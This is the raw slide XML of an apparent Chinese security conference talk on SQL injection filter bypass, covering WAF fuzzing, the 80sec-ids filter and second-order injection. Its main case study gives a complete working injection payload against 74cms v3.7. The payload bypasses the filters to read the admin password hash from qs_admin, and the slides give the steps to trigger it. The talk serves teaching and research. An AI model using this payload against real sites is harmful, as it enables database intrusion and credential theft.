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8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5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0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51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2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0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0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052D16-0D82-47A9-B2A4-95C7DC51A569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3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64292"/>
            <a:ext cx="11386868" cy="1384539"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>  浅谈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="8000" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="8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541025" y="1562524"/>
            <a:ext cx="1309112" cy="38724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cheery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57" y="1562524"/>
            <a:ext cx="65722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7835" y="0"/>
            <a:ext cx="6278320" cy="844636"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>基于代码分析和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>大法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09" y="739933"/>
            <a:ext cx="12051322" cy="6036005"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>好多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的源码都是可见的，大家可以分析他的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>然后想办法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>绕过，具体情况具体分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，需要大家了解一些函数特性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Fuzz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大法，我常用的就是当哪里需要绕过了，写一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连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句，需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>fuzz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地方用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty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写一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>循环把 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>码跑一遍，看看返回就知道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这里我们就来看看最常用见 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>80-sec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waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这里借用了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>phpmywind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来分析（这里有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>80-sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的原版</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>waf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先给大家 说说几个特殊符号的用法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9" y="3470030"/>
            <a:ext cx="9300306" cy="32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143" y="0"/>
            <a:ext cx="5254504" cy="75866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80sec-ids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的分析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62" y="758667"/>
            <a:ext cx="11198713" cy="59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23" y="109415"/>
            <a:ext cx="11988799" cy="6603999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ids </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>绕过的关键就是刚刚的代码，它会将单引号之间的内容 用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$s$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代替，我们所做的就是引入单引号包含的语句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0" y="953965"/>
            <a:ext cx="9553575" cy="248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5" y="3862264"/>
            <a:ext cx="9677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127" y="0"/>
            <a:ext cx="5660904" cy="875897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>骑士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最新版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15" y="711200"/>
            <a:ext cx="11988799" cy="5931877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一直想找一个具体的例子，刚好在准备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的时候看见骑士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更新了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>74cms_v3.7_20160401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废话不多说 先看看代码截图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Include/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>fun_company.php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我们看见这里 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$action </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的包裹竟然是用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，当然就会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发现这是一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>个注入点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" y="1980100"/>
            <a:ext cx="8058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54" y="93785"/>
            <a:ext cx="12059138" cy="6572737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>找找调用函数且可控的一个文件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/user/company/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>company_ajax.php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我们看见了函数的调用，并且参数由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$_POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方式接收，骑士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是重写了获取参数的方法的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8" y="1047262"/>
            <a:ext cx="9802690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64123"/>
            <a:ext cx="11996615" cy="6478953"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>看看全局文件  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common.inc.php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 包含了 获取方式的定义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终于找到了全局文件，我们准备来绕过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48677"/>
            <a:ext cx="8260861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3" y="4118707"/>
            <a:ext cx="9477375" cy="2219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04" y="356320"/>
            <a:ext cx="9194372" cy="35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29477" cy="6760308"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>全局需要过滤的放在一起来，需要绕过防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注入的和加强版 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>80sec-ids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59"/>
            <a:ext cx="8956431" cy="3295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" y="3798887"/>
            <a:ext cx="1159803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77" y="140677"/>
            <a:ext cx="11762153" cy="6424245"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分析一下，我们需要构造的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语句如下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="update ".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>members_setmeal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>')." set `".$action."`=`".$action."`-1  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>intval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)."  AND  effective=1 LIMIT 1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$action </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可控，我们为了查询数据出来，我的想法很简单，直接插入一个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查询，我们然后直接找到返回结果的地方查看数据就可以了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有子查询 就不得不绕过 第一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>addslashes_deep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函数，要不然子查询语句过不去，仔细看看第二个条件，如果有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>pic1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>参数就可以直接不进入第三个过滤了，我们可以传入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>pic1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>参数，利用白名单绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>最后 入库前 还有个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>80sec-ids </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只是添加了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>@ “”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关键字而已。我们照样可以利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>``.``.xx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>绕过即可</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所以 综合起来 绕过语句为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pic1=1&amp;pro_name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>stick_num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>='`.``.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>setmeal_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>select+pwd+from+qs_admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>23‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qs_members_setmeal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> set `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>stick_num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>='`.``.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>setmeal_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qs_admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) #'`=`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>stick_num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>='`.``.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>setmeal_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>qs_admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) #'`-1  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1  AND  effective=1 LIMIT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6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99" y="452718"/>
            <a:ext cx="11472985" cy="625805"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>注册一个商家，发布一个任务，职位管理处触发， 置顶这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个按钮，随便点击，然后确定抓包，修改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484556"/>
            <a:ext cx="1129323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38" y="398010"/>
            <a:ext cx="8050096" cy="852452"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>        大概的谈谈议题内容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85" y="1187938"/>
            <a:ext cx="11730891" cy="5502031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从最基本的语法开始，谈谈限制较少的注入，说说各个注入点的具体差别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分析一下常用的注入绕过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二次注入让我们突破更多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84" y="1680308"/>
            <a:ext cx="7268308" cy="4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311" y="0"/>
            <a:ext cx="5754689" cy="985313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>传入我们构造好的语句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789354"/>
            <a:ext cx="10144369" cy="54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0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774"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我的账户中查看，就得到返回信息了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6" y="1524000"/>
            <a:ext cx="10766425" cy="50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1957" y="0"/>
            <a:ext cx="6106381" cy="852451"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>二次注入让我们突破更多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8" y="734646"/>
            <a:ext cx="11957539" cy="6025662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>成因</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>: MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在储存数据时对于 转义过的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>将会储存为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，如果再次取出这个数据时，过滤不严，是非常容易再次引入单引号，造成二次注入的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30215"/>
            <a:ext cx="11923102" cy="47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74" y="124472"/>
            <a:ext cx="3456966" cy="774298"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关于二次注入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76" y="976924"/>
            <a:ext cx="11871570" cy="5681784"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关于二次注入的新漏洞就没去找了，大家有兴趣可以去看看 我们团队的前辈玉林嘎大牛 在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打雷的百度二次注入，这个把二次注入发挥到了极致，用了两次二次注入写入了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，三个白帽的第二次挑战赛就是以这个为基础的，大家有兴趣可以去看看</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我的博客上有 三个白帽第二次挑战的源码，大家可以下载搭建</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>www.cheery.so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7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680" y="116656"/>
            <a:ext cx="6645643" cy="797744"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>感谢主办方提供分享的机会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1343" y="2052919"/>
            <a:ext cx="4969241" cy="1878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/>
              <a:t>Q&amp;&amp;Q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altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> MySQL  5.X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的查询语法如下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201" y="1242034"/>
            <a:ext cx="8946541" cy="540030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4400" b="1" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>[ALL | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0"/>
              <a:t>DISTINCT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> | DISTINCTROW ]  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>[HIGH_PRIORITY]  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>[STRAIGHT_JOIN]  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1"/>
              <a:t>select_expr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> [, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1"/>
              <a:t>select_expr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> ...]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FROM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table_references</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>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WHERE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where_condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>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GROUP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0"/>
              <a:t>BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1"/>
              <a:t>col_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> | expr | position}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ASC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0"/>
              <a:t>DESC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>], ... [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0"/>
              <a:t>WITH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0"/>
              <a:t>ROLLUP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>]]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HAVING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where_condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>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ORDER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0"/>
              <a:t>BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1"/>
              <a:t>col_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> | expr | position}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ASC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
